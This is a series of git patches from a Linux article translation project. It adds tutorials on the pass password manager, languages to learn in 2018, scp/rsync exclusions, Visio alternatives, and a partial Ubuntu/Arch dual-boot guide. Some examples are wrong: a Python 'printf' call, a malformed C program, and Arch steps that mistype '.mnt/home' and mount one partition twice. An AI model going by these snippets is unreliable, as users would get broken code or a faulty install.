以目录树的形式存储加密后的文件,也就是说我们可以在逻辑上将多个文件放在子目录中以实现更好的组织形式,我们只需要在创建文件时指定存在哪个目录下就行了,像这样: +``` +$ pass edit foo/bar +``` + +跟上面的命令一样,它也会让你输入密码,但是创建的文件是放在密码仓库目录下的 `foo` 子目录中的。要查看文件组织结构,只需要不带任何参数运行 `pass` 命令即可: +``` + +$ pass +Password Store +├── foo +│   └── bar +└── mysite + +``` + +若想修改密码,只需要重复创建密码的操作就行了。 + +### 获取密码 + +有两种方法可以获取密码:第一种会显示密码到终端上,方法是运行: +``` +pass mysite +``` + +然而更好的方法是使用 `-c` 选项让 pass 将密码直接拷贝道粘帖板上: +``` +pass -c mysite +``` + +这种情况下粘帖板中的内容会在 `45` 秒后自动清除。两种方法都会要求你输入 gpg 密码。 + +### 生成密码 + +Pass 也可以为我们自动生成(并自动存储)安全密码。假设我们想要生成一个由 15 个字符组成的密码:包含字母,数字和特殊符号,其命令如下: +``` +pass generate mysite 15 +``` + +若希望密码只包含字母和数字则可以是使用 `--no-symbols` 选项。生成的密码会显示在屏幕上。也可以通过 `--clip` 或 `-c` 选项让 pass 吧密码直接拷贝到粘帖板中。通过使用 `-q` 或 `--qrcode` 选项来生成二维码: + +![qrcode][1] + +从上面的截屏中尅看出,生成了一个二维码,不过由于 `mysite` 的密码以及存在了,pass 会提示我们确认是否要覆盖原密码。 + +Pass 使用 `/dev/urandom` 设备作为(伪)随机数据生成器来生成密码,同时它使用 `xclip` 工具来将密码拷贝到粘帖板中,同时使用 `qrencode` 来将密码以二维码的形式显示出来。在我看来,这种模块化的设计正是它最大的优势:它并不重复造轮子,而只是将常用的工具包装起来完成任务。 + +你也可以使用 `pass mv`,`pass cp`,和 `pass rm` 来重命名,拷贝和删除密码仓库中的文件。 + +### 将密码仓库变成 git 仓库 + +`pass` 另一个很棒的功能就是可以将密码仓库当成 git 仓库来用:通过版本管理系统能让我们管理密码更方便。 +``` +pass git init +``` + +这会创建 git 仓库,并自动提交所有已存在的文件。下一步就是指定跟踪的远程仓库了: +``` +pass git remote add +``` + +我们可以把这个仓库当成普通密码仓库来用。唯一的不同点在于每次我们新增或修改一个密码,`pass` 都会自动将该文件加入索引并创建一个提交。 + +`pass` 有一个叫做 `qtpass` 的图形界面,而且 `pass` 也支持 Windows 和 MacOs。通过使用 `PassFF` 插件,它还能获取 firefox 中存储的密码。在它的项目网站上可以查看更多详细信息。试一下 `pass` 吧,你不会失望的! + + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/how-to-organize-your-passwords-using-pass-password-manager + +作者:[Egidio Docile][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org +[1]:/https://linuxconfig.org/images/pass-manager-qrcode.png From af14c8c77a12101625b83f014549a6eb1e91e83d Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 14:20:12 +0800 Subject: [PATCH 0878/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Best=20Programm?= =?UTF-8?q?ing=20Languages=20To=20Learn=20In=202018?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Programming Languages To Learn In 2018.md | 129 ++++++++++++++++++ 1 file changed, 129 insertions(+) create mode 100644 sources/tech/20171227 Best Programming Languages To Learn In 2018.md diff --git a/sources/tech/20171227 Best Programming Languages To Learn In 2018.md b/sources/tech/20171227 Best Programming Languages To Learn In 2018.md new file mode 100644 index 0000000000..c87d62a7d9 --- /dev/null +++ b/sources/tech/20171227 Best Programming Languages To Learn In 2018.md @@ -0,0 +1,129 @@ +Best Programming Languages To Learn In 2018 +====== + +![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/best-programming-languages-learn-for-2018_orig.jpg) + +Programming is growing as one of the most sought-after profession unlike olden times when software making was limited to just a handful of **programming languages** . Today we have a large variety of choices when it comes to programming languages. With the cross-platform support growing, most programming languages can be used for multiple tasks. Here let us have a look at some programming languages that you might want to learn in 2018 if you have not already. + +## Best programming languages to learn in 2018 + +### Python + + [![learn programming language](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/learn-programming-language_orig.png)][1] + +There is no denying about the fact that [Python][2] is ruling the market right now. Launched in 1991, python has become really famous after [YouTube][3] started using it. Python can be used in a variety of domains like Web-Development, Game Development, scripting, scientific research and almost anything you imagine. It is cross-platform and runs on an interpreter. Python has a very simple syntax and since it uses indents instead of curly braces for grouping blocks of code, the code is extremely clean. + +**Example -** + +``` +printf("Hello world!") +``` + +### Kotlin + + [![kotlin programming language](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/kotlin-programming-language_orig.jpg)][4] + +While Java has been unbeaten since the beginning, Kotlin is here to break its run. At least in Android programming. Kotlin is a newer language which has officially been supported by Google for Android apps. It is a drop in replacement for Java and seamlessly works with [java][5] code. The code is said to be drastically reduced and cleaned. The way it looks, Kotlin will totally be worth learning in 2018. + +**Example -** + +``` +class Greeter(val name: String) { + + fun greet() { + + println("Hello, $name") + + } + +} + +String Interpolation to cut down ceremony. + +fun main(args: Array) { + + Greeter(args[0]).greet() + +} +``` + +### C/C++ + +This is probably the first language that they teach in schools and colleges. C is one of the oldest languages which is still operational due to its speed of execution and simplicity in code. Though it has a steep learning curve, once you are through with C, you can do any language. You may not be able to use it for fancy websites or software, but C is the language of choice for embedded devices. With the IoT boom, C will be extensively in demand again. For C++, it is extensively used in some great software. + +**Example -** + +``` +#include + +Int main() + +{ + + printf("Hello world"); + + return 0; + +} +``` + +### PHP + + [![php programming language](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/1200px-php-logo-svg_orig.png)][6] + +The Internet is going crazy about how PHP will die, but I do not see a single reason why you should not learn PHP. It is one of the finest server scripting languages with a very simple syntax structure. More than half the internet runs on PHP. [Wordpress][7] , the most popular Content Management System is made PHP. Since this popular language has been there for over 20 years, it has an enormous collection of libraries. You will find one to get your job done. + +**Example -** + +``` +echo "Hello world!"; +``` + +### Javascript + + ![javascript programming language for web](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/javascript_orig.png) + +What do I say about this? This is the most in-demand language right now. Javascript was primarily used on the web for making the pages more dynamic. But today JavaScript has evolved to become something which is a lot more. Entire front end frameworks are being built on JavaScript. Hybrid apps written in HTML+JS are being built to run on any mobile platform. Javascript is even being used for server-side scripting with nodejs. + +**Example -** + +``` +document.write("Hello world!"); +``` + +### SQL + + [![sql database language](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/sql-database-language.png?1514386856)][8] + +SQL is an RDBMS query language which is used to fetch data from databases. There are many implementations of SQL but more or less they are all similar. Databases are being used everywhere. This article you are reading is also stored on our website's database. So you know how important it is. + +**Example -** + +``` +SELECT * FROM TABLENAME +``` + +## Conclusion + +So these were some languages that will be really worth learning in 2018\. I have not included **languages** like asp.net because they require you to learn their entire platform. Java has also not made to the list because a good number of developers are beginning to migrate to Kotlin. All of the mentioned languages are high in demand and extremely popular. They also have great community support. I hope you liked the article. If you feel I missed any of the in-demand languages, feel free to drop a comment below. + + +-------------------------------------------------------------------------------- + +via: http://www.linuxandubuntu.com/home/best-programming-languages-to-learn-in-2018 + +作者:[LinuxAndUbuntu][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.linuxandubuntu.com +[1]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/learn-programming-language_orig.png +[2]:http://www.linuxandubuntu.com/home/best-python-ides-for-linux +[3]:http://www.linuxandubuntu.com/home/youtube-dl-a-command-line-gui-youtube-facebook-dailymotion-videos-downloading-tool-for-linux +[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/kotlin-programming-language_orig.jpg +[5]:http://www.linuxandubuntu.com/home/how-to-install-oracle-java-78-on-ubuntu +[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/1200px-php-logo-svg_orig.png +[7]:http://www.linuxandubuntu.com/home/wordpress-how-to-host-and-manage-on-web-server-in-linuxubuntu-step-by-step-guide +[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/sql-database-language_orig.png From 530e1edaa0bd463d37e90112c8983ceb17e87de7 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 14:24:56 +0800 Subject: [PATCH 0879/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20excl?= =?UTF-8?q?ude=20file=20when=20using=20scp=20command=20recursively?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...file when using scp command recursively.md | 87 +++++++++++++++++++ 1 file changed, 87 insertions(+) create mode 100644 sources/tech/20171228 How to exclude file when using scp command recursively.md diff --git a/sources/tech/20171228 How to exclude file when using scp command recursively.md b/sources/tech/20171228 How to exclude file when using scp command recursively.md new file mode 100644 index 0000000000..f14c5efceb --- /dev/null +++ b/sources/tech/20171228 How to exclude file when using scp command recursively.md @@ -0,0 +1,87 @@ +How to exclude file when using scp command recursively +====== + +I need to copy all the *.c files from local laptop named hostA to hostB including all directories. I am using the following scp command but do not know how to exclude specific files (such as *.out): +``` +$ scp -r ~/projects/ user@hostB:/home/delta/projects/ +``` + +How do I tell scp command to exclude particular file or directory at the Linux/Unix command line? + +One can use scp command to securely copy files between hosts on a network. It uses ssh for data transfer and authentication purpose. Typical syntax is: + +``` +scp file1 user@host:/path/to/dest/ +scp -r /path/to/source/ user@host:/path/to/dest/ +``` + +## Scp exclude files + +I don't think so you can filter or exclude files when using scp command. However, there is a great workaround to exclude files and copy it securely using ssh. This page explains how to filter or excludes files when using scp to copy a directory recursively. + +## How to use rsync command to exclude files + +The syntax is: +`rsync av -e ssh --exclude='*.out' /path/to/source/ [[email protected]][1]:/path/to/dest/` +Where, + + 1. **-a** : Recurse into directories i.e. copy all files and subdirectories. Also, turn on archive mode and all other options (-rlptgoD) + 2. **-v** : Verbose output + 3. **-e ssh** : Use ssh for remote shell so everything gets encrypted + 4. **\--exclude='*.out'** : exclude files matching PATTERN e.g. *.out or *.c and so on. + + +### Example of rsync command + +In this example copy all file recursively from ~/virt/ directory but exclude all *.new files: +`$ rsync -av -e ssh --exclude='*.new' ~/virt/ [[email protected]][1]:/tmp` +Sample outputs: +[![Scp exclude files but using rsync exclude command][2]][2] + +Rsync command will fail if rsync not found on the remote server. In that case try the following scp command that uses [bash shell pattern matching][3] in the current directory (it won't work with the -r option): +`$ ls ` +Sample outputs: +``` +centos71.log centos71.qcow2 centos71.qcow2.new centos71.v2.qcow2.new meta-data user-data +``` + +centos71.log centos71.qcow2 centos71.qcow2.new centos71.v2.qcow2.new meta-data user-data + +Copy everything in the current directory except .new file(s): +``` +$ shopt -s extglob +$ scp !(.new)* [[email protected]][1]:/tmp/ +``` +Sample outputs: +``` +centos71.log 100 % 4262 1.3MB/s 00:00 +centos71.qcow2 100 % 836MB 32.7MB/s 00: 25 +meta-data 100 % 47 18.5KB/s 00:00 +user-data 100 % 1543 569.7KB/s 00:00 +``` + + +See the following man pages for more info: +``` +$ [man rsync][4] +$ man bash +$ [man scp][5] +``` + + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/faq/scp-exclude-files-when-using-command-recursively-on-unix-linux/ + +作者:[Vivek Gite][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.cyberciti.biz +[1]:https://www.cyberciti.biz/cdn-cgi/l/email-protection +[2]:https://www.cyberciti.biz/media/new/faq/2017/12/scp-exclude-files-on-linux-unix-macos-bash-shell-command-line.jpg +[3]:https://www.gnu.org/software/bash/manual/html_node/Pattern-Matching.html#Pattern-Matching +[4]:https://www.samba.org/ftp/rsync/rsync.html +[5]:https://man.openbsd.org/scp From e4150da4499cc4085b9e4d534c2a2227e1fdea18 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 14:31:25 +0800 Subject: [PATCH 0880/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Top=2010=20Micr?= =?UTF-8?q?osoft=20Visio=20Alternatives=20for=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Microsoft Visio Alternatives for Linux.md | 242 ++++++++++++++++++ 1 file changed, 242 insertions(+) create mode 100644 sources/tech/20171226 Top 10 Microsoft Visio Alternatives for Linux.md diff --git a/sources/tech/20171226 Top 10 Microsoft Visio Alternatives for Linux.md b/sources/tech/20171226 Top 10 Microsoft Visio Alternatives for Linux.md new file mode 100644 index 0000000000..6b98dbd30d --- /dev/null +++ b/sources/tech/20171226 Top 10 Microsoft Visio Alternatives for Linux.md @@ -0,0 +1,242 @@ +Top 10 Microsoft Visio Alternatives for Linux +====== +**Brief: If you are looking for a good Visio viewer in Linux, here are some alternatives to Microsoft Visio that you can use in Linux.** + +[Microsoft Visio][1] is a great tool for creating or generating mission-critical diagrams and vector representations. While it may be a good tool for making floor plans or other kinds of diagrams - it is neither free nor open source. + +Moreover, Microsoft Visio is not a standalone product. It comes bundled with Microsoft Office. We have already seen [open source alternatives to MS Office][2] in the past. Today we'll see what tools you can use in place of Visio on Linux. + +## Best Microsoft Visio alternatives for Linux + +![Microsoft Visio Alternatives for Linux][4] + +Mandatory disclaimer here. The list is not a ranking. The product at number three is not better than the one at number six on the list. + +I have also mentioned a couple of non open source Visio software that you can use from the web interface. + +| Software | Type | License Type | +| LibreOffice Draw | Desktop Software | Free and Open Source | +| OpenOffice Draw | Desktop Software | Free and Open Source | +| Dia | Desktop Software | Free and Open Source | +| yED Graph Editor | Desktop and web-based | Freemium | +| Inkscape | Desktop Software | Free and Open Source | +| Pencil | Desktop and web-based | Free and Open Source | +| Graphviz | Desktop Software | Free and Open Source | +| darw.io | Desktop and web-based | Free and Open Source | +| Lucidchart | Web-based | Freemium | +| Calligra Flow | Desktop Software | Free and Open Source | + + +### 1. LibreOffice Draw + +![][5] + +LibreOffice Draw module is one of the best open source alternatives to Microsoft Visio. With the help of it, you can either choose to make a quick sketch of an idea or a complex professional floor plan for presentation. Flowcharts, organization charts, network diagrams, brochures, posters, and what not! All that without even requiring to spend a penny. + +Good thing is that it comes bundled with LibreOffice which is installed in most Linux distributions by default. + +#### Overview of Key Features: + + * Style & Formatting tools to make Brochures/Posters + * Calc Data Visualization + * PDF-File editing capability + * Create Photo Albums by manipulating the pictures from Gallery + * Flexible Diagramming tools similar to the ones with Microsoft Visio (Smart Connectors, Dimension lines, etc.,) + * Supports .VSD files (to open) + + + +[LibreOffice Draw][6] + +### 2. Apache OpenOffice Draw + +![][7] + +A lot of people do know about OpenOffice (on which LibreOffice project was initially based on) but they don't really mention Apache OpenOffice Draw as an alternative to Microsoft Visio. But, for a fact - it is yet another amazing open-source diagramming software tool. Unlike LibreOffice Draw, it does not support editing PDF files but it does offer drawing tools for any type of diagram creation. + +Just a caveat here. Use this tool only if you have OpenOffice already on your system. This is because [installing OpenOffice][8] is a pain and it is [not properly developed anymore][9]. + +#### Overview of Key Features: + + * 3D Controller to create shapes quickly + * Create (.swf) flash versions of your work + * Style & Formatting tools + * Flexible Diagramming tools similar to the ones with Microsoft Visio (Smart Connectors, Dimension lines, etc.,) + + + +[Apache OpenOffice Draw][10] + +### 3. Dia + +![][11] + +Dia is yet another interesting open source tool. It may not seem to be under active development like the other ones mentioned. But, if you were looking for a free and open source alternative to Microsoft Visio for simple and decent diagrams - Dia could be your choice. The only let down of this tool for you could be its user interface. Apart from that, it does let you utilize powerful tools for a complex diagram (but it may not look great - so we recommend it for simpler diagrams). + +#### Overview of Key Features: + + * It can be used via command-line + * Styling & Formatting tools + * Shape Repository for custom shapes + * Diagramming tools similar to the ones with Microsoft Visio (Special Objects, Grid Lines, Layers, etc.,) + * Cross-platform + + + +[Dia][12] + +### 4. yED Graph Editor + +yED Graph editor is one of the most loved free Microsoft Visio alternative. If you worry about it being a freeware but not an open source project, you can still utilize [yED's live editor][13] via your web browser for free. It is one of the best recommendations if you want to make diagrams quickly with a very easy-to-use interface. + +#### Overview of Key Features: + + * Drag and drop feature for easy diagram making + * Supports importing external data for linking + + + +[yED Graph Editor][14] + +### 5. Inkscape + +![][15] + +Inkscape is a free and open source vector graphics editor. You get the basic functionalities of creating a flowchart or a data flow diagram. It does not offer advanced diagramming tools but the basic ones to create simpler diagrams. So, Inkscape could be your Visio alternative only if you are looking to generate basic diagrams with the help of diagram connector tool by utilizing the available symbols from the library. + +#### Overview of Key Features: + + * Connector Tool + * Flexible drawing tools + * Broad file format compatibility + + + +[Inkscape][16] + +### 6. Pencil Project + +![][17] + +Pencil Project is an impressive open source initiative that is available for both Windows and Mac along with Linux. It features an easy-to-use GUI which makes diagramming easier and convenient. A good collection of inbuilt shapes and symbols to make your diagrams look great. It also comes baked in with Android and iOS UI stencils to let you start prototyping apps when needed. + +You can also have it installed as a Firefox extension - but the extension does not utilize the latest build of the project. + +#### Overview of Key Features: + + * Browse cliparts easily (utilizing openclipart.org) + * Export as an ODT file / PDF file + * Diagram connector tool + * Cross-platform + + + +[Pencil Project][18] + +### 7. Graphviz + + +![][19] + +Graphviz is slightly different. It is not a drawing tool but a dedicated graph visualization tool. You should definitely utilize this tool if you are into network diagrams which require several designs to represent a node. Well, of course, you can't make a floor plan with this tool (it won't be easy at least). So, it is best-suited for network diagrams, bioinformatics, database connections, and similar stuff. + +#### Overview of Key Features: + + * Supports command-line usage + * Supports custom shapes & tabular node layouts + * Basic stying and formatting tools + + + +[Graphviz][20] + +### 8. Draw.io + +Draw.io is primarily a free web-based diagramming tool with powerful tools to make almost any type of diagrams. You just need to drag n drop and then connect them to create a flowchart, an E-R diagram, or anything relevant. Also, if you like the tool, you can try the [offline desktop version][21]. + +**Overview of Key Features:** + + * Direct uploads to a cloud storage service + * Custom Shapes + * Styling & Formatting tools + * Cross-platform + + + +[Draw.io][22] + +### 9. Lucidchart + +![][23] + +Lucidchart is a premium web-based diagramming tool which offers a free subscription with limited features. You can utilize the free subscription to create several types of diagrams and export them as an image or a PDF. However, the free version does not support data linking and Visio import/export functionality. If you do not need data linking -Lucidchart could prove to be a very good tool while generating beautiful diagrams. + +#### Overview of Key Features: + + * Integrations to Slack, Jira Core, Confluence + * Ability to make product mockups + * Import Visio files + + + +[Lucidchart][24] + +### 10. Calligra Flow + +![calligra flow][25] + +Calligra Flow is a part of [Calligra Project][26] which aims to provide free and open source software tools. With Calligra flow, you can easily create network diagrams, entity-relation diagrams, flowcharts, and more. + +#### Overview of Key Features: + + * Wide range of stencil boxes + * Styling and formatting tools + + + +[Calligra Flow][27] + +### Wrapping Up + +Now that you know about the best free and open source Visio alternatives, what do you think about them? + +Are they better than Microsoft Visio in any aspect of your requirements? Also, let us know in the comments below if we missed any of your favorite diagramming tools as an Linux alternative to Microsoft Visio. + +-------------------------------------------------------------------------------- + +via: https://itsfoss.com/visio-alternatives-linux/ + +作者:[Ankush Das][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com/author/ankush/ +[1]:https://products.office.com/en/visio/flowchart-software +[2]:https://itsfoss.com/best-free-open-source-alternatives-microsoft-office/ +[3]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs= +[4]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/12/visio-alternatives-linux-featured.png +[5]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/12/libreoffice-draw-microsoft-visio-alternatives.jpg +[6]:https://www.libreoffice.org/discover/draw/ +[7]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/12/apache-open-office-draw.jpg +[8]:https://itsfoss.com/install-openoffice-ubuntu-linux/ +[9]:https://itsfoss.com/openoffice-shutdown/ +[10]:https://www.openoffice.org/product/draw.html +[11]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/12/dia-screenshot.jpg +[12]:http://dia-installer.de/ +[13]:https://www.yworks.com/products/yed-live +[14]:https://www.yworks.com/products/yed +[15]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/12/inkscape-screenshot.jpg +[16]:https://inkscape.org/en/ +[17]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/12/pencil-project.jpg +[18]:http://pencil.evolus.vn/Downloads.html +[19]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/12/graphviz.jpg +[20]:http://graphviz.org/ +[21]:https://about.draw.io/integrations/#integrations_offline +[22]:https://about.draw.io/ +[23]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/12/lucidchart-visio-alternative.jpg +[24]:https://www.lucidchart.com/ +[25]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/12/calligra-flow.jpg +[26]:https://www.calligra.org/ +[27]:https://www.calligra.org/flow/ From 4d930ecc686bf017e00cf6f9959448d6e7808aec Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 14:36:11 +0800 Subject: [PATCH 0881/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Dual=20Boot=20U?= =?UTF-8?q?buntu=20And=20Arch=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...0171228 Dual Boot Ubuntu And Arch Linux.md | 367 ++++++++++++++++++ 1 file changed, 367 insertions(+) create mode 100644 sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md diff --git a/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md b/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md new file mode 100644 index 0000000000..6a9091befa --- /dev/null +++ b/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md @@ -0,0 +1,367 @@ +Dual Boot Ubuntu And Arch Linux +====== +![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dual-boot-ubuntu-and-arch-linux_orig.jpg) + +**Dual booting Ubuntu and Arch Linux** is not as easy as it sounds, however, I’ll make the process as easy as possible with much clarity. First, we will need to install Ubuntu then Arch Linux since it's much easier configuring the Ubuntu grub to be able to **dual boot Ubuntu and Arch Linux** + +### Dual Boot Ubuntu And Arch Linux + +Some of the things you will need: + +1. Ubuntu flavor of your choice, in this case, I’ll use ubuntu 17.10 iso + +2. 2 USB sticks + +3. Windows PC or Linux based PC + +4. Arch Linux iso + +5. Rufus(for windows) or etcher(for Linux distro) + +### ​Install Ubuntu 16.10 + +​First, [create a bootable flash drive][1] using Rufus for both Ubuntu and Arch Linux. Alternatively, you could use etcher to create bootable flash drives for both Ubuntu and Arch Linux. + + [![bootable ubuntu usb etcher image writer](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bootable-ubuntu-usb-etcher-image-writer_orig.jpg)][2] + +Select the ISO image file for Ubuntu then select the flash drive of your choice after which click flash to create the bootable flash drive. Wait till it completes and Voila! Your bootable flash drive is ready for use. + + [![make ubuntu usb bootable in linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-ubuntu-usb-bootable-in-linux_orig.jpg)][3] + +​Turn on your machine and boot using the bootable flash drive with the Ubuntu installation media. Ensure that you boot into UEFI or BIOS compatibility mode depending on the type of PC you are using. I prefer using UEFI for a newer PC builds. + + [![live ubuntu boot](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/live-ubuntu-boot_orig.jpg)][4] + +​Upon Successful boot, you will see the following screen asking you to try Ubuntu or install Ubuntu. Choose install Ubuntu. + + [![install usb from live usb](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-usb-from-live-usb_orig.jpg)][5] + +​Then check install third-party software for graphics and Wifi hardware, MP3 and other media. Optionally if you have an internet connection choose download updates while installing Ubuntu since it will save time setting up the installation as well as ensure you get the latest updates of your installation. + + [![custom partition hd install ubuntu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/custom-partition-hd-install-ubuntu_orig.jpg)][6] + +​Then choose ‘Something else’ so that we can partition the hard disk and set aside space for swap, Ubuntu, and Archlinux. + + [![create swap partition ubuntu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-swap-partition-ubuntu_orig.jpg)][7] + +​Create a swap area partition. Preferably half the size of the ram. In my case, I have 1GB of ram thus 512mb of swap area space. + + [![install ubuntu root partition](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-root-partition_orig.jpg)][8] + +​Then create a partition with mount point ‘/’. Then click the install now button. + + [![select ubuntu timezone](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-ubuntu-timezone_orig.jpg)][9] + +Choose your location then choose language and keyboard settings. + + [![select ubuntu keyboard layout](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-select-location-keyboard-layout_orig.jpg)][10] + +​Then create the user credentials that will create a new user. + + [![create username, system name ubuntu install](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-username-system-name-ubuntu-install_orig.jpg)][11] + +​The installation will now start by clicking next. + + [![ubuntu installation finishing](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finishing_orig.jpg)][12] + +​When the installation is done click on restart PC. + + [![ubuntu installation finished restart system](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finished_orig.jpg)][13] + +​Remove the installation media and press enter when done. + + [![remove installation media after ubuntu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/remove-installation-media-after-ubuntu_orig.jpg)][14] + +​Upon confirmation of successful installation, restart and boot into the Arch Linux installation media. + +### ​Install Arch Linux + +​Upon booting into the + +**Arch Linux installation media** + +you should see an initial screen as follows. Choose Boot Arch Linux(x86_64). Note Arch Linux is a more of + +[DYF][15] + +(do it yourself) kind of Operating system. + + [![arch linux installation boot menu](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-installation-boot-menu_orig.jpg)][16] + +After choosing, it will open a tty1 terminal that you will use to install the operating system. + + [![arch linux tty1 linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-tty1-linux_orig.png)][17] Note: You will need an internet connection to download some packages in order to install Arch Linux successfully. So we need to check if the internet is working fine. Enter the following into the terminal to check internet connectivity. + +ping linuxandubuntu.com -c 4 + + [![arch linux ping check internet connection](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-ping-check-internet-connection_orig.png)][18] + +​If the internet is working fine you should get an echo back showing the number of packets sent and received. In this case, we sent 4 echos and got 4 back meaning the connection is good. + +If you want to setup Wifi in Arch Linux, read this post + +[here][19] + +on setting up Wifi in Arch Linux. + +​Next, we need to select the partition that’s free that we had earlier set aside while installing Ubuntu. + +fdisk -l + +​The above should show you the available disks that are there. You should see the Ubuntu partitions as well as the free space. We will use cfdisk to partition. + +cfdisk + + [![install arch partition disk with cfdisk](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-partition-disk-with-cfdisk_orig.png)][20] + +You will see the partitions. Select the free space that is below the other allocated partitions. + +​You will need to select new and then enter the partition size for the partition. + + [![partition free space swap arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/partition-free-space-swap-arch-linux_orig.png)][21] Use for example 9.3G - G representing gigabytes. [![install arch linux partition](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-partition_orig.png)][22] + +Make the partition primary as below. + + [![make arch linux root as primary partition](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-arch-linux-root-as-primary-partition_orig.png)][23] Then choose the write partition entry. [![select partition to install arch](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-partition-to-install-arch_orig.png)][24] + +​Type ‘yes’ to confirm the writing of the partition. + + [![install arch linux confirm create partition](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-confirm-create-partition_orig.png)][25] + +Then choose the quit option. + + [![quit cfdisk arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/quit-cfdisk-arch-linux_orig.png)][26] Then type: + +fdisk -l + +​To confirm the changes + + [![confirm partition changes](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/confirm-partition-changes_orig.png)][27] + +​Then partition the disk using: + +mkfs.ext4 /dev/sda3 + +​Make sure the partition you choose is the last one that we created so that we don’t mess with the Ubuntu partition. + + [![complete arch linux installation partition](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/complete-arch-linux-installation-partition_orig.png)][28] + +​Then mount it to using the following command - + +mount /dev/sda3 /mnt + + [![mount base partition in arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/mount-base-partition-in-arch-linux.png?1514472693)][29] + +​Make a home directory using: + +mkdir .mnt/home + + [![mount home partition arch linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/mount-home-partition-arch-linux.png?1514472866)][30] + +​Mount the home folder to the partition using + +mount /dev/sda3 /mnt/home + + [![make mount home directory](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/make-mount-home-directory.png?1514472960)][31] + +​Now install the base system of Archlinux using the command: + +pacstrap /mnt base + +Make sure you have an internet connection. + +​ + 